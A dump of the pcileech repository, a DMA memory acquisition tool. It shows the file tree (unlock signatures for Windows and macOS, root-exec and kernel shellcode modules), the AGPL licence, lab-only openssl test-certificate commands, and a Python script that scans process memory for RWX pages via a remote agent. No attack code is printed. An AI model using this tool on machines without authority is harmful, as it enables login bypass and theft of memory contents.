Repository: ufrisk/pcileech
Branch: master
Commit: bcfdec117b82
Files: 189
Total size: 1.7 MB
Directory structure:
gitextract_qpoecbmd/
├── .gitignore
├── LICENSE
├── files/
│ ├── Certs/
│ │ └── readme.txt
│ ├── agent-find-rwx.py
│ ├── fbsdx64_filepull.ksh
│ ├── lx64_exec_root.ksh
│ ├── lx64_filedelete.ksh
│ ├── lx64_filepull.ksh
│ ├── lx64_filepush.ksh
│ ├── macos_filepull.ksh
│ ├── macos_filepush.ksh
│ ├── macos_unlock.ksh
│ ├── pcileech.icns
│ ├── pcileech.txt
│ ├── pcileech_gensig.cfg
│ ├── signature_info.txt
│ ├── stickykeys_cmd_win.sig
│ ├── uefi_textout.ksh
│ ├── uefi_winload_ntos_patch.ksh
│ ├── unlock_macos.sig
│ ├── unlock_win10x64.sig
│ ├── unlock_win10x86.sig
│ ├── unlock_win11x64.sig
│ ├── unlock_win8x64.sig
│ ├── unlock_winvistax64.sig
│ ├── win7x64.kmd
│ ├── winvistax64.kmd
│ ├── wx64_driverinfo.ksh
│ ├── wx64_driverload_svc.ksh
│ ├── wx64_driverunload.ksh
│ ├── wx64_filepull.ksh
│ ├── wx64_filepush.ksh
│ ├── wx64_pageinfo.ksh
│ ├── wx64_pagesignature.ksh
│ ├── wx64_psblue.ksh
│ ├── wx64_pscmd.ksh
│ ├── wx64_pscmd_user.ksh
│ ├── wx64_pscreate.ksh
│ ├── wx64_pskill.ksh
│ ├── wx64_pslist.ksh
│ └── wx64_unlock.ksh
├── includes/
│ ├── dokan.h
│ ├── fileinfo.h
│ ├── leechcore.h
│ ├── leechgrpc.h
│ ├── lib32/
│ │ ├── leechcore.lib
│ │ └── vmm.lib
│ ├── lib64/
│ │ ├── leechcore.lib
│ │ └── vmm.lib
│ ├── libpdbcrust.h
│ ├── public.h
│ ├── vmmdll.h
│ └── vmmyara.h
├── pcileech/
│ ├── Makefile
│ ├── Makefile.macos
│ ├── charutil.c
│ ├── charutil.h
│ ├── device.c
│ ├── device.h
│ ├── executor.c
│ ├── executor.h
│ ├── extra.c
│ ├── extra.h
│ ├── help.c
│ ├── help.h
│ ├── kmd.c
│ ├── kmd.h
│ ├── memdump.c
│ ├── memdump.h
│ ├── mempatch.c
│ ├── mempatch.h
│ ├── ob/
│ │ ├── ob.h
│ │ ├── ob_cachemap.c
│ │ ├── ob_core.c
│ │ ├── ob_map.c
│ │ └── ob_set.c
│ ├── oscompatibility.c
│ ├── oscompatibility.h
│ ├── pcileech.c
│ ├── pcileech.h
│ ├── pcileech.rc
│ ├── pcileech.vcxproj
│ ├── pcileech.vcxproj.filters
│ ├── pcileech.vcxproj.user
│ ├── shellcode.h
│ ├── statistics.c
│ ├── statistics.h
│ ├── umd.c
│ ├── umd.h
│ ├── util.c
│ ├── util.h
│ ├── version.h
│ ├── vfs.c
│ ├── vfs.h
│ ├── vfslist.c
│ ├── vfslist.h
│ ├── vmmx.c
│ └── vmmx.h
├── pcileech.sln
├── pcileech_shellcode/
│ ├── fbsdx64_common.c
│ ├── fbsdx64_common.h
│ ├── fbsdx64_common_a.asm
│ ├── fbsdx64_filepull.c
│ ├── fbsdx64_stage2.asm
│ ├── fbsdx64_stage3.asm
│ ├── fbsdx64_stage3_c.c
│ ├── info_kmd_core.txt
│ ├── lx64_common.c
│ ├── lx64_common.h
│ ├── lx64_common_a.asm
│ ├── lx64_exec_root.c
│ ├── lx64_filedelete.c
│ ├── lx64_filepull.c
│ ├── lx64_filepush.c
│ ├── lx64_stage2.asm
│ ├── lx64_stage2_efi.asm
│ ├── lx64_stage3.asm
│ ├── lx64_stage3_c.c
│ ├── lx64_stage3_pre.asm
│ ├── lx64_vfs.c
│ ├── macos_common.c
│ ├── macos_common.h
│ ├── macos_common_a.asm
│ ├── macos_filedelete.c
│ ├── macos_filepull.c
│ ├── macos_filepush.c
│ ├── macos_stage2.asm
│ ├── macos_stage3.asm
│ ├── macos_stage3_c.c
│ ├── macos_unlock.c
│ ├── macos_vfs.c
│ ├── pcileech_shellcode.vcxproj
│ ├── pcileech_shellcode.vcxproj.filters
│ ├── pcileech_shellcode.vcxproj.user
│ ├── statuscodes.h
│ ├── uefi_common.c
│ ├── uefi_common.h
│ ├── uefi_common_a.asm
│ ├── uefi_kmd.asm
│ ├── uefi_kmd_c.c
│ ├── uefi_textout.c
│ ├── uefi_winload_ntos_kmd.asm
│ ├── uefi_winload_ntos_kmd_c.c
│ ├── uefi_winload_ntos_patch.c
│ ├── wx64_common.c
│ ├── wx64_common.h
│ ├── wx64_common_a.asm
│ ├── wx64_driverinfo.c
│ ├── wx64_driverload_svc.c
│ ├── wx64_driverunload.c
│ ├── wx64_exec_user.asm
│ ├── wx64_exec_user_c.c
│ ├── wx64_filepull.c
│ ├── wx64_filepush.c
│ ├── wx64_pageinfo.asm
│ ├── wx64_pagesignature.c
│ ├── wx64_psblue.asm
│ ├── wx64_pscreate.c
│ ├── wx64_pskill.c
│ ├── wx64_pslist.c
│ ├── wx64_stage1.asm
│ ├── wx64_stage2.asm
│ ├── wx64_stage23_vmm.asm
│ ├── wx64_stage23_vmm3.asm
│ ├── wx64_stage2_hal.asm
│ ├── wx64_stage3.asm
│ ├── wx64_stage3_c.c
│ ├── wx64_stage3_pre.asm
│ ├── wx64_umd_exec.asm
│ ├── wx64_umd_exec_c.c
│ ├── wx64_unlock.c
│ └── wx64_vfs.c
├── readme.md
├── usb3380.md
└── usb3380_flash/
├── linux/
│ ├── Makefile
│ ├── pcileech_flash.c
│ ├── readme.md
│ └── readme_flash.txt
└── windows/
├── USB3380Flash/
│ ├── USB3380Flash.c
│ ├── USB3380Flash.h
│ ├── USB3380Flash.inf
│ ├── USB3380Flash.user
│ ├── USB3380Flash.vcxproj
│ ├── USB3380Flash.vcxproj.filters
│ └── USB3380Flash.vcxproj.user
└── USB3380Flash_Installer/
├── USB3380Flash_Installer.vcxproj
├── USB3380Flash_Installer.vcxproj.filters
├── USB3380Flash_Installer.vcxproj.user
└── installer.c
================================================
FILE CONTENTS
================================================
================================================
FILE: .gitignore
================================================
/.vs
/files/pcileech
/files/lib
/files/temp
/files/x86/lib
/files/USB3380Flash
/files/USB3380Flash_installer
*.bin
*.cod
*.dll
*.exe
*.idb
*.lnk
*.obj
*.so
*.zip
*.dylib
================================================
FILE: LICENSE
================================================
GNU AFFERO GENERAL PUBLIC LICENSE
Version 3, 19 November 2007
Copyright (C) 2007 Free Software Foundation, Inc. <https://fsf.org/>
Everyone is permitted to copy and distribute verbatim copies
of this license document, but changing it is not allowed.
Preamble
The GNU Affero General Public License is a free, copyleft license for
software and other kinds of works, specifically designed to ensure
cooperation with the community in the case of network server software.
The licenses for most software and other practical works are designed
to take away your freedom to share and change the works. By contrast,
our General Public Licenses are intended to guarantee your freedom to
share and change all versions of a program--to make sure it remains free
software for all its users.
When we speak of free software, we are referring to freedom, not
price. Our General Public Licenses are designed to make sure that you
have the freedom to distribute copies of free software (and charge for
them if you wish), that you receive source code or can get it if you
want it, that you can change the software or use pieces of it in new
free programs, and that you know you can do these things.
Developers that use our General Public Licenses protect your rights
with two steps: (1) assert copyright on the software, and (2) offer
you this License which gives you legal permission to copy, distribute
and/or modify the software.
A secondary benefit of defending all users' freedom is that
improvements made in alternate versions of the program, if they
receive widespread use, become available for other developers to
incorporate. Many developers of free software are heartened and
encouraged by the resulting cooperation. However, in the case of
software used on network servers, this result may fail to come about.
The GNU General Public License permits making a modified version and
letting the public access it on a server without ever releasing its
source code to the public.
The GNU Affero General Public License is designed specifically to
ensure that, in such cases, the modified source code becomes available
to the community. It requires the operator of a network server to
provide the source code of the modified version running there to the
users of that server. Therefore, public use of a modified version, on
a publicly accessible server, gives the public access to the source
code of the modified version.
An older license, called the Affero General Public License and
published by Affero, was designed to accomplish similar goals. This is
a different license, not a version of the Affero GPL, but Affero has
released a new version of the Affero GPL which permits relicensing under
this license.
The precise terms and conditions for copying, distribution and
modification follow.
TERMS AND CONDITIONS
0. Definitions.
"This License" refers to version 3 of the GNU Affero General Public License.
"Copyright" also means copyright-like laws that apply to other kinds of
works, such as semiconductor masks.
"The Program" refers to any copyrightable work licensed under this
License. Each licensee is addressed as "you". "Licensees" and
"recipients" may be individuals or organizations.
To "modify" a work means to copy from or adapt all or part of the work
in a fashion requiring copyright permission, other than the making of an
exact copy. The resulting work is called a "modified version" of the
earlier work or a work "based on" the earlier work.
A "covered work" means either the unmodified Program or a work based
on the Program.
To "propagate" a work means to do anything with it that, without
permission, would make you directly or secondarily liable for
infringement under applicable copyright law, except executing it on a
computer or modifying a private copy. Propagation includes copying,
distribution (with or without modification), making available to the
public, and in some countries other activities as well.
To "convey" a work means any kind of propagation that enables other
parties to make or receive copies. Mere interaction with a user through
a computer network, with no transfer of a copy, is not conveying.
An interactive user interface displays "Appropriate Legal Notices"
to the extent that it includes a convenient and prominently visible
feature that (1) displays an appropriate copyright notice, and (2)
tells the user that there is no warranty for the work (except to the
extent that warranties are provided), that licensees may convey the
work under this License, and how to view a copy of this License. If
the interface presents a list of user commands or options, such as a
menu, a prominent item in the list meets this criterion.
1. Source Code.
The "source code" for a work means the preferred form of the work
for making modifications to it. "Object code" means any non-source
form of a work.
A "Standard Interface" means an interface that either is an official
standard defined by a recognized standards body, or, in the case of
interfaces specified for a particular programming language, one that
is widely used among developers working in that language.
The "System Libraries" of an executable work include anything, other
than the work as a whole, that (a) is included in the normal form of
packaging a Major Component, but which is not part of that Major
Component, and (b) serves only to enable use of the work with that
Major Component, or to implement a Standard Interface for which an
implementation is available to the public in source code form. A
"Major Component", in this context, means a major essential component
(kernel, window system, and so on) of the specific operating system
(if any) on which the executable work runs, or a compiler used to
produce the work, or an object code interpreter used to run it.
The "Corresponding Source" for a work in object code form means all
the source code needed to generate, install, and (for an executable
work) run the object code and to modify the work, including scripts to
control those activities. However, it does not include the work's
System Libraries, or general-purpose tools or generally available free
programs which are used unmodified in performing those activities but
which are not part of the work. For example, Corresponding Source
includes interface definition files associated with source files for
the work, and the source code for shared libraries and dynamically
linked subprograms that the work is specifically designed to require,
such as by intimate data communication or control flow between those
subprograms and other parts of the work.
The Corresponding Source need not include anything that users
can regenerate automatically from other parts of the Corresponding
Source.
The Corresponding Source for a work in source code form is that
same work.
2. Basic Permissions.
All rights granted under this License are granted for the term of
copyright on the Program, and are irrevocable provided the stated
conditions are met. This License explicitly affirms your unlimited
permission to run the unmodified Program. The output from running a
covered work is covered by this License only if the output, given its
content, constitutes a covered work. This License acknowledges your
rights of fair use or other equivalent, as provided by copyright law.
You may make, run and propagate covered works that you do not
convey, without conditions so long as your license otherwise remains
in force. You may convey covered works to others for the sole purpose
of having them make modifications exclusively for you, or provide you
with facilities for running those works, provided that you comply with
the terms of this License in conveying all material for which you do
not control copyright. Those thus making or running the covered works
for you must do so exclusively on your behalf, under your direction
and control, on terms that prohibit them from making any copies of
your copyrighted material outside their relationship with you.
Conveying under any other circumstances is permitted solely under
the conditions stated below. Sublicensing is not allowed; section 10
makes it unnecessary.
3. Protecting Users' Legal Rights From Anti-Circumvention Law.
No covered work shall be deemed part of an effective technological
measure under any applicable law fulfilling obligations under article
11 of the WIPO copyright treaty adopted on 20 December 1996, or
similar laws prohibiting or restricting circumvention of such
measures.
When you convey a covered work, you waive any legal power to forbid
circumvention of technological measures to the extent such circumvention
is effected by exercising rights under this License with respect to
the covered work, and you disclaim any intention to limit operation or
modification of the work as a means of enforcing, against the work's
users, your or third parties' legal rights to forbid circumvention of
technological measures.
4. Conveying Verbatim Copies.
You may convey verbatim copies of the Program's source code as you
receive it, in any medium, provided that you conspicuously and
appropriately publish on each copy an appropriate copyright notice;
keep intact all notices stating that this License and any
non-permissive terms added in accord with section 7 apply to the code;
keep intact all notices of the absence of any warranty; and give all
recipients a copy of this License along with the Program.
You may charge any price or no price for each copy that you convey,
and you may offer support or warranty protection for a fee.
5. Conveying Modified Source Versions.
You may convey a work based on the Program, or the modifications to
produce it from the Program, in the form of source code under the
terms of section 4, provided that you also meet all of these conditions:
a) The work must carry prominent notices stating that you modified
it, and giving a relevant date.
b) The work must carry prominent notices stating that it is
released under this License and any conditions added under section
7. This requirement modifies the requirement in section 4 to
"keep intact all notices".
c) You must license the entire work, as a whole, under this
License to anyone who comes into possession of a copy. This
License will therefore apply, along with any applicable section 7
additional terms, to the whole of the work, and all its parts,
regardless of how they are packaged. This License gives no
permission to license the work in any other way, but it does not
invalidate such permission if you have separately received it.
d) If the work has interactive user interfaces, each must display
Appropriate Legal Notices; however, if the Program has interactive
interfaces that do not display Appropriate Legal Notices, your
work need not make them do so.
A compilation of a covered work with other separate and independent
works, which are not by their nature extensions of the covered work,
and which are not combined with it such as to form a larger program,
in or on a volume of a storage or distribution medium, is called an
"aggregate" if the compilation and its resulting copyright are not
used to limit the access or legal rights of the compilation's users
beyond what the individual works permit. Inclusion of a covered work
in an aggregate does not cause this License to apply to the other
parts of the aggregate.
6. Conveying Non-Source Forms.
You may convey a covered work in object code form under the terms
of sections 4 and 5, provided that you also convey the
machine-readable Corresponding Source under the terms of this License,
in one of these ways:
a) Convey the object code in, or embodied in, a physical product
(including a physical distribution medium), accompanied by the
Corresponding Source fixed on a durable physical medium
customarily used for software interchange.
b) Convey the object code in, or embodied in, a physical product
(including a physical distribution medium), accompanied by a
written offer, valid for at least three years and valid for as
long as you offer spare parts or customer support for that product
model, to give anyone who possesses the object code either (1) a
copy of the Corresponding Source for all the software in the
product that is covered by this License, on a durable physical
medium customarily used for software interchange, for a price no
more than your reasonable cost of physically performing this
conveying of source, or (2) access to copy the
Corresponding Source from a network server at no charge.
c) Convey individual copies of the object code with a copy of the
written offer to provide the Corresponding Source. This
alternative is allowed only occasionally and noncommercially, and
only if you received the object code with such an offer, in accord
with subsection 6b.
d) Convey the object code by offering access from a designated
place (gratis or for a charge), and offer equivalent access to the
Corresponding Source in the same way through the same place at no
further charge. You need not require recipients to copy the
Corresponding Source along with the object code. If the place to
copy the object code is a network server, the Corresponding Source
may be on a different server (operated by you or a third party)
that supports equivalent copying facilities, provided you maintain
clear directions next to the object code saying where to find the
Corresponding Source. Regardless of what server hosts the
Corresponding Source, you remain obligated to ensure that it is
available for as long as needed to satisfy these requirements.
e) Convey the object code using peer-to-peer transmission, provided
you inform other peers where the object code and Corresponding
Source of the work are being offered to the general public at no
charge under subsection 6d.
A separable portion of the object code, whose source code is excluded
from the Corresponding Source as a System Library, need not be
included in conveying the object code work.
A "User Product" is either (1) a "consumer product", which means any
tangible personal property which is normally used for personal, family,
or household purposes, or (2) anything designed or sold for incorporation
into a dwelling. In determining whether a product is a consumer product,
doubtful cases shall be resolved in favor of coverage. For a particular
product received by a particular user, "normally used" refers to a
typical or common use of that class of product, regardless of the status
of the particular user or of the way in which the particular user
actually uses, or expects or is expected to use, the product. A product
is a consumer product regardless of whether the product has substantial
commercial, industrial or non-consumer uses, unless such uses represent
the only significant mode of use of the product.
"Installation Information" for a User Product means any methods,
procedures, authorization keys, or other information required to install
and execute modified versions of a covered work in that User Product from
a modified version of its Corresponding Source. The information must
suffice to ensure that the continued functioning of the modified object
code is in no case prevented or interfered with solely because
modification has been made.
If you convey an object code work under this section in, or with, or
specifically for use in, a User Product, and the conveying occurs as
part of a transaction in which the right of possession and use of the
User Product is transferred to the recipient in perpetuity or for a
fixed term (regardless of how the transaction is characterized), the
Corresponding Source conveyed under this section must be accompanied
by the Installation Information. But this requirement does not apply
if neither you nor any third party retains the ability to install
modified object code on the User Product (for example, the work has
been installed in ROM).
The requirement to provide Installation Information does not include a
requirement to continue to provide support service, warranty, or updates
for a work that has been modified or installed by the recipient, or for
the User Product in which it has been modified or installed. Access to a
network may be denied when the modification itself materially and
adversely affects the operation of the network or violates the rules and
protocols for communication across the network.
Corresponding Source conveyed, and Installation Information provided,
in accord with this section must be in a format that is publicly
documented (and with an implementation available to the public in
source code form), and must require no special password or key for
unpacking, reading or copying.
7. Additional Terms.
"Additional permissions" are terms that supplement the terms of this
License by making exceptions from one or more of its conditions.
Additional permissions that are applicable to the entire Program shall
be treated as though they were included in this License, to the extent
that they are valid under applicable law. If additional permissions
apply only to part of the Program, that part may be used separately
under those permissions, but the entire Program remains governed by
this License without regard to the additional permissions.
When you convey a copy of a covered work, you may at your option
remove any additional permissions from that copy, or from any part of
it. (Additional permissions may be written to require their own
removal in certain cases when you modify the work.) You may place
additional permissions on material, added by you to a covered work,
for which you have or can give appropriate copyright permission.
Notwithstanding any other provision of this License, for material you
add to a covered work, you may (if authorized by the copyright holders of
that material) supplement the terms of this License with terms:
a) Disclaiming warranty or limiting liability differently from the
terms of sections 15 and 16 of this License; or
b) Requiring preservation of specified reasonable legal notices or
author attributions in that material or in the Appropriate Legal
Notices displayed by works containing it; or
c) Prohibiting misrepresentation of the origin of that material, or
requiring that modified versions of such material be marked in
reasonable ways as different from the original version; or
d) Limiting the use for publicity purposes of names of licensors or
authors of the material; or
e) Declining to grant rights under trademark law for use of some
trade names, trademarks, or service marks; or
f) Requiring indemnification of licensors and authors of that
material by anyone who conveys the material (or modified versions of
it) with contractual assumptions of liability to the recipient, for
any liability that these contractual assumptions directly impose on
those licensors and authors.
All other non-permissive additional terms are considered "further
restrictions" within the meaning of section 10. If the Program as you
received it, or any part of it, contains a notice stating that it is
governed by this License along with a term that is a further
restriction, you may remove that term. If a license document contains
a further restriction but permits relicensing or conveying under this
License, you may add to a covered work material governed by the terms
of that license document, provided that the further restriction does
not survive such relicensing or conveying.
If you add terms to a covered work in accord with this section, you
must place, in the relevant source files, a statement of the
additional terms that apply to those files, or a notice indicating
where to find the applicable terms.
Additional terms, permissive or non-permissive, may be stated in the
form of a separately written license, or stated as exceptions;
the above requirements apply either way.
8. Termination.
You may not propagate or modify a covered work except as expressly
provided under this License. Any attempt otherwise to propagate or
modify it is void, and will automatically terminate your rights under
this License (including any patent licenses granted under the third
paragraph of section 11).
However, if you cease all violation of this License, then your
license from a particular copyright holder is reinstated (a)
provisionally, unless and until the copyright holder explicitly and
finally terminates your license, and (b) permanently, if the copyright
holder fails to notify you of the violation by some reasonable means
prior to 60 days after the cessation.
Moreover, your license from a particular copyright holder is
reinstated permanently if the copyright holder notifies you of the
violation by some reasonable means, this is the first time you have
received notice of violation of this License (for any work) from that
copyright holder, and you cure the violation prior to 30 days after
your receipt of the notice.
Termination of your rights under this section does not terminate the
licenses of parties who have received copies or rights from you under
this License. If your rights have been terminated and not permanently
reinstated, you do not qualify to receive new licenses for the same
material under section 10.
9. Acceptance Not Required for Having Copies.
You are not required to accept this License in order to receive or
run a copy of the Program. Ancillary propagation of a covered work
occurring solely as a consequence of using peer-to-peer transmission
to receive a copy likewise does not require acceptance. However,
nothing other than this License grants you permission to propagate or
modify any covered work. These actions infringe copyright if you do
not accept this License. Therefore, by modifying or propagating a
covered work, you indicate your acceptance of this License to do so.
10. Automatic Licensing of Downstream Recipients.
Each time you convey a covered work, the recipient automatically
receives a license from the original licensors, to run, modify and
propagate that work, subject to this License. You are not responsible
for enforcing compliance by third parties with this License.
An "entity transaction" is a transaction transferring control of an
organization, or substantially all assets of one, or subdividing an
organization, or merging organizations. If propagation of a covered
work results from an entity transaction, each party to that
transaction who receives a copy of the work also receives whatever
licenses to the work the party's predecessor in interest had or could
give under the previous paragraph, plus a right to possession of the
Corresponding Source of the work from the predecessor in interest, if
the predecessor has it or can get it with reasonable efforts.
You may not impose any further restrictions on the exercise of the
rights granted or affirmed under this License. For example, you may
not impose a license fee, royalty, or other charge for exercise of
rights granted under this License, and you may not initiate litigation
(including a cross-claim or counterclaim in a lawsuit) alleging that
any patent claim is infringed by making, using, selling, offering for
sale, or importing the Program or any portion of it.
11. Patents.
A "contributor" is a copyright holder who authorizes use under this
License of the Program or a work on which the Program is based. The
work thus licensed is called the contributor's "contributor version".
A contributor's "essential patent claims" are all patent claims
owned or controlled by the contributor, whether already acquired or
hereafter acquired, that would be infringed by some manner, permitted
by this License, of making, using, or selling its contributor version,
but do not include claims that would be infringed only as a
consequence of further modification of the contributor version. For
purposes of this definition, "control" includes the right to grant
patent sublicenses in a manner consistent with the requirements of
this License.
Each contributor grants you a non-exclusive, worldwide, royalty-free
patent license under the contributor's essential patent claims, to
make, use, sell, offer for sale, import and otherwise run, modify and
propagate the contents of its contributor version.
In the following three paragraphs, a "patent license" is any express
agreement or commitment, however denominated, not to enforce a patent
(such as an express permission to practice a patent or covenant not to
sue for patent infringement). To "grant" such a patent license to a
party means to make such an agreement or commitment not to enforce a
patent against the party.
If you convey a covered work, knowingly relying on a patent license,
and the Corresponding Source of the work is not available for anyone
to copy, free of charge and under the terms of this License, through a
publicly available network server or other readily accessible means,
then you must either (1) cause the Corresponding Source to be so
available, or (2) arrange to deprive yourself of the benefit of the
patent license for this particular work, or (3) arrange, in a manner
consistent with the requirements of this License, to extend the patent
license to downstream recipients. "Knowingly relying" means you have
actual knowledge that, but for the patent license, your conveying the
covered work in a country, or your recipient's use of the covered work
in a country, would infringe one or more identifiable patents in that
country that you have reason to believe are valid.
If, pursuant to or in connection with a single transaction or
arrangement, you convey, or propagate by procuring conveyance of, a
covered work, and grant a patent license to some of the parties
receiving the covered work authorizing them to use, propagate, modify
or convey a specific copy of the covered work, then the patent license
you grant is automatically extended to all recipients of the covered
work and works based on it.
A patent license is "discriminatory" if it does not include within
the scope of its coverage, prohibits the exercise of, or is
conditioned on the non-exercise of one or more of the rights that are
specifically granted under this License. You may not convey a covered
work if you are a party to an arrangement with a third party that is
in the business of distributing software, under which you make payment
to the third party based on the extent of your activity of conveying
the work, and under which the third party grants, to any of the
parties who would receive the covered work from you, a discriminatory
patent license (a) in connection with copies of the covered work
conveyed by you (or copies made from those copies), or (b) primarily
for and in connection with specific products or compilations that
contain the covered work, unless you entered into that arrangement,
or that patent license was granted, prior to 28 March 2007.
Nothing in this License shall be construed as excluding or limiting
any implied license or other defenses to infringement that may
otherwise be available to you under applicable patent law.
12. No Surrender of Others' Freedom.
If conditions are imposed on you (whether by court order, agreement or
otherwise) that contradict the conditions of this License, they do not
excuse you from the conditions of this License. If you cannot convey a
covered work so as to satisfy simultaneously your obligations under this
License and any other pertinent obligations, then as a consequence you may
not convey it at all. For example, if you agree to terms that obligate you
to collect a royalty for further conveying from those to whom you convey
the Program, the only way you could satisfy both those terms and this
License would be to refrain entirely from conveying the Program.
13. Remote Network Interaction; Use with the GNU General Public License.
Notwithstanding any other provision of this License, if you modify the
Program, your modified version must prominently offer all users
interacting with it remotely through a computer network (if your version
supports such interaction) an opportunity to receive the Corresponding
Source of your version by providing access to the Corresponding Source
from a network server at no charge, through some standard or customary
means of facilitating copying of software. This Corresponding Source
shall include the Corresponding Source for any work covered by version 3
of the GNU General Public License that is incorporated pursuant to the
following paragraph.
Notwithstanding any other provision of this License, you have
permission to link or combine any covered work with a work licensed
under version 3 of the GNU General Public License into a single
combined work, and to convey the resulting work. The terms of this
License will continue to apply to the part which is the covered work,
but the work with which it is combined will remain governed by version
3 of the GNU General Public License.
14. Revised Versions of this License.
The Free Software Foundation may publish revised and/or new versions of
the GNU Affero General Public License from time to time. Such new versions
will be similar in spirit to the present version, but may differ in detail to
address new problems or concerns.
Each version is given a distinguishing version number. If the
Program specifies that a certain numbered version of the GNU Affero General
Public License "or any later version" applies to it, you have the
option of following the terms and conditions either of that numbered
version or of any later version published by the Free Software
Foundation. If the Program does not specify a version number of the
GNU Affero General Public License, you may choose any version ever published
by the Free Software Foundation.
If the Program specifies that a proxy can decide which future
versions of the GNU Affero General Public License can be used, that proxy's
public statement of acceptance of a version permanently authorizes you
to choose that version for the Program.
Later license versions may give you additional or different
permissions. However, no additional obligations are imposed on any
author or copyright holder as a result of your choosing to follow a
later version.
15. Disclaimer of Warranty.
THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY
APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT
HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY
OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM
IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF
ALL NECESSARY SERVICING, REPAIR OR CORRECTION.
16. Limitation of Liability.
IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS
THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY
GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE
USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF
DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD
PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS),
EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF
SUCH DAMAGES.
17. Interpretation of Sections 15 and 16.
If the disclaimer of warranty and limitation of liability provided
above cannot be given local legal effect according to their terms,
reviewing courts shall apply local law that most closely approximates
an absolute waiver of all civil liability in connection with the
Program, unless a warranty or assumption of liability accompanies a
copy of the Program in return for a fee.
END OF TERMS AND CONDITIONS
How to Apply These Terms to Your New Programs
If you develop a new program, and you want it to be of the greatest
possible use to the public, the best way to achieve this is to make it
free software which everyone can redistribute and change under these terms.
To do so, attach the following notices to the program. It is safest
to attach them to the start of each source file to most effectively
state the exclusion of warranty; and each file should have at least
the "copyright" line and a pointer to where the full notice is found.
<one line to give the program's name and a brief idea of what it does.>
Copyright (C) <year> <name of author>
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU Affero General Public License as published
by the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Affero General Public License for more details.
You should have received a copy of the GNU Affero General Public License
along with this program. If not, see <https://www.gnu.org/licenses/>.
Also add information on how to contact you by electronic and paper mail.
If your software can interact with users remotely through a computer
network, you should also make sure that it provides a way for users to
get its source. For example, if your program is a web application, its
interface could display a "Source" link that leads users to an archive
of the code. There are many ways you could offer source, and different
solutions will be better for different programs; see section 13 for the
specific requirements.
You should also get your employer (if you work as a programmer) or school,
if any, to sign a "copyright disclaimer" for the program, if necessary.
For more information on this, and how to apply and follow the GNU AGPL, see
<https://www.gnu.org/licenses/>.
================================================
FILE: files/Certs/readme.txt
================================================
Example commands for generating self-signed TEST certificates for gRPC mTLS remote connections.
These are for local testing only: the private keys are written unencrypted (-nodes), the subject
is a fixed CN=localhost, and the PKCS#12 export password is trivial. For anything beyond a lab,
issue proper per-deployment certificates instead, and keep the .key/.p12 files out of version control.
Password to the generated PKCS#12 (.p12/.pfx) files: test
Generate with commands:
openssl req -x509 -newkey rsa:2048 -keyout client-tls.key -out client-tls.crt -days 365 -nodes -subj "/CN=localhost"
openssl pkcs12 -export -out client-tls.p12 -inkey client-tls.key -in client-tls.crt -password pass:test
openssl req -x509 -newkey rsa:2048 -keyout server-tls.key -out server-tls.crt -days 365 -nodes -subj "/CN=localhost"
openssl pkcs12 -export -out server-tls.p12 -inkey server-tls.key -in server-tls.crt -password pass:test
================================================
FILE: files/agent-find-rwx.py
================================================
# Example file to demonstrate remote python functionality with the LeechAgent.
#
# Example:
# pcileech.exe -device <device> -remote rpc://<spn or insecure>:host agent-execpy -in agent-find-rwx.py
#
# The Python script is executed in a child process of the LeechAgent, in the
# user context of the LeechAgent. If the agent runs as a service this is most
# likely SYSTEM - i.e. anyone who is allowed to reach and authenticate to the
# agent gets arbitrary code execution at that privilege level on the remote
# host. Restrict network access to the agent accordingly, and treat the
# 'insecure' remote option in the example above (which, as its name suggests,
# forgoes the SPN-authenticated transport) as suitable for isolated lab
# networks only. The same mechanism can also be used to run arbitrary Python
# scripts on the remote host without using the memory analysis functionality.
#
# Please check out agent installation instructions at:
# https://github.com/ufrisk/LeechCore/wiki/LeechAgent
# https://github.com/ufrisk/LeechCore/wiki/LeechAgent_Install
#
#
# Example to load LeechCore for Python connecting to the memory acquisition device
# specified in the PCILeech -device parameter. Please uncomment to activate.
# Guide at: https://github.com/ufrisk/LeechCore/wiki/LeechCore_API_Python
#
'''
import leechcorepyc
lc = leechcorepyc.LeechCore('existing')
print(lc)
'''
#
# Example: load MemProcFS for Python on top of the memory acquisition device
# given in the PCILeech -device parameter ('-device existingremote' appears to
# reuse the already-open remote device rather than opening a new one - confirm
# against the MemProcFS docs). For MemProcFS Python API usage examples and a
# youtube demo please check out the wiki:
# https://github.com/ufrisk/MemProcFS/wiki/API_Python
#
#
import memprocfs

# Walk every process and print each page-table entry whose 'flags' value
# contains '-rwx' (presumably a readable, writable AND executable mapping,
# which is what an RWX hunt is after). Whether 'flags' is a string or a
# sequence is not visible here; the 'in' test works for either.
vmm = memprocfs.Vmm(['-device', 'existingremote'])
for proc in vmm.process_list():
    rwx_ptes = (pte for pte in proc.maps.pte() if '-rwx' in pte['flags'])
    for pte in rwx_ptes:
        print(': '.join([str(proc.pid), proc.name, str(pte)]))
================================================
FILE: files/pcileech.txt
================================================
Download the latest binaries from https://github.com/ufrisk/pcileech/releases/latest
================================================
FILE: files/pcileech_gensig.cfg
================================================
